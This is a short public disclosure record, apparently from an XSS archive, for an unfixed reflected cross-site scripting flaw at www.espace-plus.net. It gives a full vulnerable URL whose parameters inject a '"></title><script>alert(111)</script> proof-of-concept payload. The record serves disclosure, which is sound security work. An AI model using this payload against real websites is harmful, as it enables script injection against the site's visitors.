Unfixed XSS vulnerability at www.espace-plus.net

2008-11-22T00:00:00
ID XSSED:54841
Type xssed
Reporter xylitol
Modified 2011-11-29T00:00:00

Description

Security researcher xylitol submitted, on 22/11/2008, a cross-site scripting (XSS) vulnerability affecting www.espace-plus.net, which at the time of submission ranked 55626 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 29/11/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.espace-plus.net/pub_disclamer.php?synergie=%27%22%3E%3C/title%3E%3Cscript%3Ealert(111)%3C/script%3Ehetero&lg=fr%27%22%3E%27%22%3E%3C/title%3E%3Cscript%3Ealert(111)%3C/script%3E/title%3E%3Cscript%3Ealert(111)%3C/script%3E&age=0%27%22%3E%3C/title%3E%3Cscript%3Ealert(111)%3C/script%3E&rencontre=%27%22%3E%3C/title%3E%3Cscript%3Ealert(111)%3C/script%3E&no=http%3A%2F%2Fdingophone.sonnerie.net&yes=http%3A%2F%2Fwww.zone-adulte.net%2Fvideo%2Fvideos-3-1049426-pdv3selfdailyunlog300x250general22Novembergeneraliste.php%3Ftracker%3Dselfdailyunlog-300x250-general-22-November_redir_0_0%26id%3D51120&scrolls=%27%22%3E%3C/title%3E%3Cscript%3Ealert(111)%3C/script%3E&exit=%27%22%3E%3C/title%3E%3Cscript%3Ealert(111)%3C/script%3E1&exit_url=http%3A%2F%2Foutils.yes-messenger.com%2Fpdv4.php%3Fe%3D1%26w%3D0%26tracker%3Dselfdailyunlog-300x250-general-22%27%22%3E%3C/title%3E%3Cscript%3Ealert(111)%3C/script%3E-November_pop_0_0%26id%3D51120&exit_type=under&tracker=selfdailyunlog-300x250-%27%22%3E%3C/title%3E%3Cscript%3Ealert(111)%3C/script%3Egeneral-22-November_redir_0_0&disc_exit=%27%22%3E%3C/title%3E%3Cscript%3Ealert(111)%3C/script%3E1